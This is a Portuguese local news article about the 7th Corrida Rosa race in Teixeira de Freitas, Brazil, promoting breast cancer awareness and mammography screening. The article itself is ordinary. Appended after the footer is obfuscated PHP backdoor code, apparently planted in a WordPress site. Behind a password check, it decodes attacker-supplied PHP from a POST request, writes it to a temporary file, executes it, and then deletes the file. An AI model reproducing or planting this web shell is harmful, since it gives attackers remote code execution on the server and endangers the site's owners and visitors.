• SEJA BEM-VINDO

Conheça a Corrida Rosa e sua importância na prevenção no câncer de mama

Publicado em: 10/10/2022 Atualizado:: outubro 10, 2022

 

No último domingo (09), ocorreu a 7ª edição da Corrida Rosa na cidade de Teixeira de Freitas. A competição, realizada nas modalidades de 6 e 3 km, teve o intuito de conscientizar a comunidade sobre a importância do esporte na prevenção e tratamento do câncer de mama, dando suporte ao Grupo de Apoio aos Pacientes Oncológicos (GAPO) do município.

 

O evento, que teve concentração na Avenida Presidente Getúlio Vargas, realizou a arrecadação de alimentos e recursos voltados a instituições que cuidam de pacientes oncológicos. Jully participou da corrida na distância de 6 km, percorrendo o trajeto em 29 minutos, e ressaltou a importância da conscientização: “muitas mulheres não possuem informação sobre exames e sobre como se cuidar num modo geral. Esse é um jeito maravilhoso de se informar”.

 

 

 

“Estamos aqui com um sentimento de muito amor, que é o lema dessa corrida”, disse Sandra Drago, secretária de Esporte e Lazer de Teixeira de Freitas. “Sempre vou levantar a bandeira da atividade física enquanto aliada no combate dessa e outras doenças. Vamos nos movimentar, cuidar do nosso corpo e da nossa saúde. Sou prova viva disso”.

 

 

A Prefeitura Municipal de Teixeira de Freitas, através da Linha de Cuidado da Saúde da Mulher em parceria com a Rede de Atenção Básica e Unidade de Alta Complexidade em Oncologia (UNACON), ofereceu o serviço de captação a partir de orientações sobre o câncer de mama, além de testes rápidos, aferição de pressão, averiguação de glicemia e rastreamento para mamografias. “Estamos captando, em especial, mulheres de 50 a 69 anos que estão aqui na corrida e não realizaram a mamografia nesses últimos dois anos e a partir de 35 anos. com histórico familiar e que realizaram há mais de 1 ano”, explicou Giselly Alcântara, diretora Linha de Cuidado da Saúde da Mulher.

 

 

 

 

As Unidades Básicas de Saúde (UBS) do município oferecem orientações sobre o câncer de mama, câncer de útero e marcação de mamografias. Recomenda-se que o exame seja realizado de 2 em 2 anos por mulheres de 50 a 69 anos, e anualmente a partir dos 35 anos — em caso de histórico familiar de primeiro grau de câncer de mama e de útero.

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}